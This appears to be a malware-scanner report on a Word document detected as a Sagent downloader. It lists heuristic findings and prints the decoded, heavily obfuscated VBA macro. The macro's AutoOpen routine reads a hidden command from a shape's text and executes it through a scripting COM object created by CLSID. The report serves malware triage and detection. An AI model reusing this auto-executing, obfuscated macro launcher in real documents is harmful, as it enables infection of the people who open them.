MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Sagent-6770602-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6770602-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929)) Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929)) Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8670 bytes |
SHA-256: 03c80322adc5ed0c9d05cce44b777ef98063d60644dd19364c28c04c98364b23 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
152 of 213 identifiers look randomly generated (e.g. 'iWjjBhRHTXRK') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PkowIcjGjd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case UaspKDFv
Case 47065385
KWPAl = 298282062
XBrwJiQ = AqXPLtENN
XGRJAOiIY = 225925296
Case 85541435
ajiJl = ChrW(98964747)
iLrbwJ = CDate(87147712)
fvGFJCCN = 253676228
End Select
NAdTA = 70452598 + CByte(jtQolCIp - Sqr(imfiUAmjz)) * RcDFYV - wXOqOKhtP * wuutwQ / CDate(102085106) * 151707143 * 101141963 / (222688372 - Sin(50315826))
On Error Resume Next
Select Case FfhlbpvUI
Case 235911890
GiZIA = 45919840
LsAdM = KhorfZS
iwqOMpw = 280291147
Case 3453682
wzjBnJMz = ChrW(230586242)
rWrcTIbu = CDate(4557344)
ojRjb = 252025557
End Select
tnRHUsKh = 100517225 + CByte(ItffiqjfH - Sqr(NvEOD)) * wAMfzaBaS - RbWij * DQSAVYGth / CDate(6116981) * 126327619 * 221731624 / (143988171 - Sin(327908881))
On Error Resume Next
Select Case PlrwlmABF
Case 150422277
mufHUj = 297646447
PWjpRCIM = jhvvJKPuA
nVhXYvk = 165371959
Case 244970137
tTbvfZV = ChrW(230604607)
ZtdZKUXaR = CDate(192019897)
QMTMFRiz = 53707279
End Select
hdWiwNGAQ = 236066310 + CByte(jwbcKvXC - Sqr(USvBN)) * zPpNrVaC - QGrNGRaBt * jOsjvWKwG / CDate(163553499) * 99075433 * 219665962 / (142234830 - Sin(135283864))
On Error Resume Next
Select Case OpMGniWjb
Case 156209630
PVasoF = 234989890
ItZbJVF = wSJlJD
EXcbVEO = 171847052
Case 230825871
ifANvzV = ChrW(136038887)
swoNClhXZ = CDate(110542988)
lBLtWV = 83690406
End Select
OZuTqwa = 278633433 + CByte(wBVoR - Sqr(LfPJZq)) * hoJRqhUG - ZlqGYwdzP * ucZYvdU / CDate(272164653) * 342233639 * 90528137 / (41882491 - Sin(80265236))
Set rLDsTF = Shapes("iWjjBhRHTXRK")
On Error Resume Next
Select Case ufWKZ
Case 309286980
BHKOikiJ = 267518997
jHUYkKM = QdMQh
sRRfHIC = 306914546
Case 73815853
fSqpE = ChrW(28154312)
pvItb = CDate(214586761)
JUJFJRVk = 173322659
End Select
WQTDCjWl = 317768271 + CByte(tSTXAM - Sqr(XUZlQkk)) * mzwltku - LSokznPlI * RnrBlEz / CDate(264241919) * 326466901 * 105871627 / (8567289 - Sin(301486903))
On Error Resume Next
Select Case vlSFcT
Case 221536904
DJfSCj = 341215289
zHBZi = zzfEWjB
OwmnfszE = 310047223
Case 163517714
pwMwfchq = ChrW(316689909)
EQlhX = CDate(264239995)
ZYzBKS = 314249248
End Select
fOBHBtMc = 275418182 + CByte(bkAzbopF - Sqr(JjAGHEj)) * WbifiRP - OjjuQsnvs * DSZwILFqm / CDate(18275994) * 203898990 * 53921011 / (299567498 - Sin(15986985))
rTcjEKpCY = "" + miqRM + hPjZACf + HFLbfkF + mTwilNr + PXjLH + rLDsTF.TextFrame.TextRange.Text + pPtjtVI + NQTMn + ShMwsTk
On Error Resume Next
Select Case HkNHSzNFr
Case 109859747
ssKio = 70181634
DdpqotjSY = SQizqck
aWqVzPtW = 276139425
Case 82666416
zFtwv = ChrW(33506647)
IQvTazY = CDate(247281357)
ahLBPZzN = 264873743
End Select
hjZwS = 20994145 + CByte(RZWYSn - Sqr(MUTpGvqzL)) * SoiLmaI - KtXzjUdQ * iwPOI / CDate(302987070) * 121050640 * 267564997 / (310825458 - Sin(37306340))
On Error Resume Next
Select Case uwTzHowG
Case 74645740
SFzad = 267549258
jotJVFYi = GjShZIfvB
ZWXOpiko = 225312451
Case 233056162
UjpwEwrZ = ChrW(162683247)
uUQhPodiJ = CDate(174618900)
ZwOOL = 170857594
End Select
akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929))
Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case sZQBMk
Case 158862562
aXcIpvQQ = 231297077
rowoGnE = mrMRLQhs
IwZoDMhj = 167798848
Case 119549965
pfpWDzHj = ChrW(112967697)
ScwXz = CDate(211913008)
JLLbzII = 129385421
End Select
oocPI = 219493163 + CByte(UAHCqNM - Sqr(AbjpU)) * RFjLWNG - rWjCt * SEBvlH / CDate(187433039) * 153185743 * 276203566 / (194635611 - Sin(207483968))
On Error Resume Next
Select Case YWorFpvV
Case 85240233
PaYqUL = 134744850
kwmJRJX = NIwYvP
LRVjOoaTq = 339589182
Case 192452526
KwjzQNa = ChrW(93187078)
zOEfT = CDate(302357269)
mWoSAbM = 164812703
End Select
iFnJdvJoj = 85875614 + CByte(jLiLUB - Sqr(OCQAuuwhU)) * KZikHw - HmEaBEQw * ivbod / CDate(327941650) * 334220028 * 216514260 / (324434850 - Sin(145942981))
On Error Resume Next
Select Case iTjLmni
Case 83176121
pLinzJ = 80414360
sFzusJuPz = OEHPjBDE
QjKPUpB = 76912563
Case 263530848
mNwjUK = ChrW(324245675)
iqKowpHQ = CDate(51442161)
afhjsm = 313666799
End Select
hpiEqz = 45400678 + CByte(KTRVn - Sqr(jOYOM)) * kVIEhpl - fCUKo * dIIaz / CDate(85600769) * 219394120 * 304944702 / (199952496 - Sin(262226020))
On Error Resume Next
Select Case ROFHsczMi
Case 321683068
PmhcTsYL = 30555891
cmlIj = NGmcf
TifKvnzR = 291112727
Case 30574567
OzQfKQR = ChrW(166911943)
NipcTwIVj = CDate(38175876)
UEiTwzJwk = 90475119
End Select
RXOXLTcD = 277153836 + CByte(ChXktCq - Sqr(fcimMDKSz)) * NHUpjaRR - wnpsjP * RWGiFuS / CDate(1452950) * 32394139 * 243456681 / (33541537 - Sin(207038570))
Const zWrhQA = 0
On Error Resume Next
Select Case OADITYYhH
Case 139072698
uhdzbiU = 246818640
OWnLq = hQBzzNQ
VwRcnfL = 87877551
Case 80589425
TmnaZhj = ChrW(61646342)
NcsNsS = CDate(325387825)
IfHXJiEIB = 65427972
End Select
jGwBK = 79439219 + CByte(DiHqUSnsC - Sqr(dkZKq)) * DiEDJIjS - XbcNPbh * BOOjR / CDate(73252112) * 266973689 * 236816555 / (111658236 - Sin(182628004))
tDCnZp.Run@ rTcjEKpCY, zWrhQA
On Error Resume Next
Select Case GsNKU
Case 188607820
RaSZHbcC = 232504936
ODiAt = wRNoiKwPs
HvJKiukN = 333418736
Case 208186535
JNqnCiBM = ChrW(322928149)
DMsQsG = CDate(261652226)
HbDjY = 132300396
End Select
sYiTSUCO = 93490668 + CByte(DXBbfwDv - Sqr(DiQtln)) * FrDicpWFJ - XsiuB * idpjmjciz / CDate(247409612) * 30278393 * 109289365 / (337393465 - Sin(185030380))
On Error Resume Next
Select Case OqBXWbCFs
Case 90690385
JWwfzvK = 126932774
FwOtzpQ = PulqPb
HDKiEmGs = 252614991
Case 309895013
DNnfAal = ChrW(283696788)
ScHajLsq = CDate(328318071)
kuuOXtl = 207597298
End Select
kwEbwV = 254195055 + CByte(WjtLE - Sqr(oSfwkws)) * QuJKhIwPm - uWGoNA * EtJVH / CDate(28242843) * 113065894 * 205237496 / (144782125 - Sin(42845652))
On Error Resume Next
Select Case wOzYloijh
Case 77154702
PLIwpooPU = 7986401
IKZiSR = qFcMKn
SvGrB = 23151630
Case 176826162
hWkMLnE = ChrW(202398223)
utoGn = CDate(337153126)
WMRqG = 151113981
End Select
AUoWt = 222406710 + CByte(TzjjcCw - Sqr(GfmaY)) * RzCfvD - omkVKUj * XQKwjbvEZ / CDate(71326420) * 320643247 * 34124043 / (106900415 - Sin(41793660))
On Error Resume Next
Select Case OPpPwbK
Case 283673441
lwTdwokwv = 340203408
vLvnw = WUJLTvW
qqrKh = 236219348
Case 329270463
uCCzwlBi = ChrW(31186027)
oMjDU = CDate(17764338)
aFqhkR = 6483484
End Select
YFwsnOPKH = 113561624 + CByte(kzZlTfHKH - Sqr(WnVpr)) * iHGJl - BYjDl * vYCblc / CDate(117311871) * 146812707 * 9278315 / (127861361 - Sin(153093612))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.